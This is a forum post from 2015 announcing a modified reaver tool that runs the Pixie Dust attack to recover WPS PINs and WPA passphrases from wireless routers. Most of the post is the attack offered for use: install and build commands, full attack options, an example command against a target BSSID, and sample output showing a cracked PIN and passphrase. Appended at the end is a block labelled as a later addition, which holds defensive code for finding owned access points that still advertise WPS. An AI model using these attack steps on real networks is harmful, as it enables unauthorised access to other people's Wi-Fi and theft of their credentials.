1  Computer Security / Wireless Hacking / Reaver modification for Pixie Dust Attack (pixiewps) on: 16 April 2015, 18:34 pm
Hello

DataHead and I made modifications to reaver so that it runs the Pixie Dust Attack, tests the PIN number and automates all the work

Here is our contribution

GitHub
https://github.com/t6x/reaver-wps-fork-t6x



Overview

    reaver-wps-fork-t6x is a modification made from the reaver fork (https://code.google.com/p/reaver-wps-fork/)

    This modified version uses the Pixie Dust attack to find the correct WPS PIN offline

    The attack used in this version was developed by Wiire (https://github.com/wiire/pixiewps)



Install Required Libraries and Tools

    Libraries for reaver

      
Code:
sudo apt-get install libpcap-dev aircrack-ng sqlite3 libsqlite3-dev

    Tools

      
Code:
You must have installed the pixiewps created by Wiire (https://github.com/wiire/pixiewps)



Compile and Install

Code:
Build Reaver

      cd reaver-wps-fork-t6x-master
      cd src
      ./configure
      make

Install Reaver

      sudo make install



Usage - Reaver

Code:
Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>
mod by DataHead

Required Arguments:
        -i, --interface=<wlan>          Name of the monitor-mode interface to use
        -b, --bssid=<mac>               BSSID of the target AP

Optional Arguments:
        -m, --mac=<mac>                 MAC of the host system
        -e, --essid=<ssid>              ESSID of the target AP
        -c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f)
        -o, --out-file=<file>           Send output to a log file [stdout]
        -s, --session=<file>            Restore a previous session file
        -C, --exec=<command>            Execute the supplied command upon successful pin recovery
        -D, --daemonize                 Daemonize reaver
        -a, --auto                      Auto detect the best advanced options for the target AP
        -f, --fixed                     Disable channel hopping
        -5, --5ghz                      Use 5GHz 802.11 channels
        -v, --verbose                   Display non-critical warnings (-vv for more)
        -q, --quiet                     Only display critical messages
        -K, --pixie-dust                Test Pixie Dust [1] Basic(-S) [2] With E-Once(-S) [3] With PKR
        -Z, --no-auto-pass              Not run automatically reaver to get the password when the pixiewps retrieves the pin
        -h, --help                      Show help

Advanced Options:
        -p, --pin=<wps pin>             Use the specified 4 or 8 digit WPS pin
        -d, --delay=<seconds>           Set the delay between pin attempts [1]
        -l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [60]
        -g, --max-attempts=<num>        Quit after num pin attempts
        -x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0]
        -r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
        -t, --timeout=<seconds>         Set the receive timeout period [5]
        -T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]
        -A, --no-associate              Do not associate with the AP (association must be done by another application)
        -N, --no-nacks                  Do not send NACK messages when out of order packets are received
        -S, --dh-small                  Use small DH keys to improve crack speed
        -L, --ignore-locks              Ignore locked state reported by the target AP
        -E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
        -n, --nack                      Target AP always sends a NACK [Auto]
        -w, --win7                      Mimic a Windows 7 registrar [False]
        -X, --exhaustive                Set exhaustive mode from the beginning of the session [False]
        -1, --p1-index                  Set initial array index for the first half of the pin [False]
        -2, --p2-index                  Set initial array index for the second half of the pin [False]
        -P, --pixiedust-loop            Set Into PixieLoop mode ( doesnt send M4, and loops through to M3 [False]

Example:
        reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv -K 1



Usage - wash

Code:
Wash v1.5.1 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>
mod by DataHead

Required Arguments:
        -i, --interface=<iface>              Interface to capture packets on
        -f, --file [FILE1 FILE2 FILE3 ...]   Read packets from capture files

Optional Arguments:
        -c, --channel=<num>                  Channel to listen on [auto]
        -o, --out-file=<file>                Write data to file
        -n, --probes=<num>                   Maximum number of probes to send to each AP in scan mode [15]
        -D, --daemonize                      Daemonize wash
        -C, --ignore-fcs                     Ignore frame checksum errors
        -5, --5ghz                           Use 5GHz 802.11 channels
        -s, --scan                           Use scan mode
        -u, --survey                         Use survey mode [default]
        -P, --file-output-piped              Output Piped x|y|z...
        -g, --get-chipset                    Output Piped and tries to read the chipset with reaver
        -h, --help                           Show help

Example:
        wash -i mon0



Example

Code:
Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>

[+] Switching mon0 to channel 1
[?] Restore previous session for A.:9.:D.:....:....:...? [n/Y] n
[+] Waiting for beacon from A.:9.:D.:....:....:...
[+] Associated with A.:9.:D.:....:....:.... (ESSID: ......)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: c6:66:a6:72:37:6d:......
[P] PKE: 10:cf:cc:88:99:4b:15:de:a6:b3:26:fe:93:24:......
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Number: RT2860
[P] WPS Model Serial Number: A978FD123BC
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:......
[P] AuthKey: bf:68:34:b5:ce:e2:a1:24:dc:15:01:1c:78:9e:74:......
[+] Sending M2 message
[P] E-Hash1: 2e:d5:17:16:36:b8:c2:bb:d1:14:7c:18:cf:89:58:b8:1d:9d:39:......
[P] E-Hash2: 94:fb:41:53:55:b3:8e:1c:fe:2b:a3:9b:b5:82:11:......
[Pixie-Dust]
[Pixie-Dust]   [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]   [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]   [*] PSK1: dd:09:bd:24:......
[Pixie-Dust]   [*] PSK2: 77:e0:dd:00:......
[Pixie-Dust]   [+] WPS pin: 9178....
[Pixie-Dust]
[Pixie-Dust]   [*] Time taken: 0 s
[Pixie-Dust]
Running the reaver with the correct pin wait ...

[Reaver Test] BSSID: A.:9.:D.:3.:..:..
[Reaver Test] Channel: 1
[Reaver Test] [+] WPS PIN: '9178....'
[Reaver Test] [+] WPA PSK: '112233'
[Reaver Test] [+] AP SSID: '....'


Code:
# wash -i mon0 -g -c 2
XX:XX:XX:XX:XX:XX| 1|-68|1.0|No |AAA| D-Link| DIR-615
XX:XX:XX:XX:XX:XX| 1|-58|1.0|No |CCC| ASUSTeK Computer Inc.| RT-N56U



For any problem or suggestion, please contact me
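
For the defensive side of the `wash -g` piped output shown in the post, the following added example (not part of the original post or of the reaver project) parses that format and lists which access points from an authorised inventory still advertise WPS, so that WPS can be disabled on them. The column meanings, the sample lines and the `OWNED` inventory are assumptions constructed for illustration.

```python
import re
from typing import NamedTuple

# Constructed sample in the shape of the `wash -g` lines in the post.
# Assumed columns: BSSID|channel|RSSI|WPS version|locked|ESSID|vendor|model
SAMPLE = """\
# wash -i mon0 -g -c 2
02:00:00:00:00:01| 1|-68|1.0|No |AAA| D-Link| DIR-615
02:00:00:00:00:02| 1|-58|1.0|No |CCC| ASUSTeK Computer Inc.| RT-N56U
02:00:00:00:00:03| 6|-40|1.0|Yes|LAB| ExampleVendor| EX-1
02:00:00:00:00:04| 11|-70|1.0|No |a|b| ExampleVendor| EX-2
garbage line
"""

# Hypothetical inventory: BSSIDs the auditor is authorised to assess.
OWNED = {"02:00:00:00:00:01", "02:00:00:00:00:03"}

MAC_RE = re.compile(r"[0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5}")

class AP(NamedTuple):
    bssid: str
    channel: int
    rssi: int
    wps_version: str
    locked: bool
    essid: str
    vendor: str
    model: str

def parse_wash(text):
    """Parse piped wash lines, skipping prompts, banners and damaged rows."""
    aps = []
    for line in text.splitlines():
        head = line.split("|", 5)
        if len(head) != 6 or not MAC_RE.fullmatch(head[0].strip()):
            continue
        tail = head[5].rsplit("|", 2)  # an ESSID may itself contain '|'
        if len(tail) != 3:
            continue
        try:
            chan, rssi = int(head[1]), int(head[2])
        except ValueError:
            continue
        aps.append(AP(head[0].strip().upper(), chan, rssi, head[3].strip(),
                      head[4].strip().lower() == "yes", *(t.strip() for t in tail)))
    return aps

def wps_findings(aps, owned):
    """Return (bssid, vendor, model, lock state) for in-scope APs advertising WPS."""
    return sorted((a.bssid, a.vendor, a.model, "locked" if a.locked else "unlocked")
                  for a in aps if a.bssid in owned)
```

Calling `wps_findings(parse_wash(SAMPLE), OWNED)` yields one row per in-scope access point; out-of-scope BSSIDs are parsed but never reported.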